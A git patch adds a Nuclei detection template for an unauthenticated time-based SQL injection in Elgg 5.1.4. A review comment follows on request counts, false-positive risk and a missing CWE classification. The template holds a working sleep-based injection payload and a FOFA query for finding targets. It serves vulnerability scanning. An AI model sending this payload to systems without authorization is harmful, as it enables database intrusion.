From 894d4bda0d8dcefa03bfd8dd4dcd0edabf9a3ea4 Mon Sep 17 00:00:00 2001
From: Kazgangap
Date: Wed, 21 Aug 2024 20:39:15 +0300
Subject: [PATCH] elgg sqli
---
 http/vulnerabilities/other/elgg-sqli.yaml | 47 +++++++++++++++++++++++
 1 file changed, 47 insertions(+)
 create mode 100644 http/vulnerabilities/other/elgg-sqli.yaml
diff --git a/http/vulnerabilities/other/elgg-sqli.yaml b/http/vulnerabilities/other/elgg-sqli.yaml
new file mode 100644
index 00000000000..17c4b672775
--- /dev/null
+++ b/http/vulnerabilities/other/elgg-sqli.yaml
@@ -0,0 +1,47 @@
+id: elgg-sqli
+
+info:
+ name: Elgg 5.1.4 - SQL Injection
+ author: s4e-io
+ severity: high
+ description: |
+ Elgg 5.1.4 version has a SQL Injection vulnerability in the sort_by[direction] parameter. This vulnerability allows an unauthenticated attacker to manipulate SQL queries by injecting malicious SQL code, potentially leading to unauthorized data access or database compromise. No user authentication is required to exploit this vulnerability.
+ reference:
+ - https://github.com/4rdr/proofs/blob/main/info/Elgg_unauth_SQLi_5.1.4.md
+ - https://github.com/Elgg/Elgg
+ metadata:
+ max-request: 1
+ vendor: elgg
+ product: elgg
+ fofa-query: icon_hash="413602919"
+ tags: elgg,sqli
+
+flow: http(1) && http(2)
+
+http:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body,"elgg.js")'
+ - 'status_code == 200'
+ condition: and
+ internal: true
+
+ - raw:
+ - |
+ @timeout 20s
+ GET /members?sort_by%5Bproperty%5D=name&sort_by%5Bproperty_type%5D=metadata&sort_by%5Bdirection%5D=desc%2c(select*from(select(sleep(6)))a) HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration >= 6'
+ - 'contains(body,"All members")'
+ - 'status_code == 200'
+ condition: and
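Review bot: `max-request: 1` under `info.metadata` undercounts this template: the `http` section defines two raw requests (the fingerprint `GET /` and the `/members` request) and `flow: http(1) && http(2)` runs both, so the line should read `max-request: 2`. The verdict on the second request rests on `duration >= 6` plus a 200 status and the generic string "All members", all of which a slow or overloaded host can satisfy without the injected sleep ever executing, so this is prone to false positives when run at scale; a preceding baseline timing of the same endpoint without the sleep clause, or a version string check, would make the match more trustworthy. The `info` block also lacks a `classification` entry; adding `cwe-id: CWE-89` there lets consumers of the template categorize the finding consistently with the rest of the corpus.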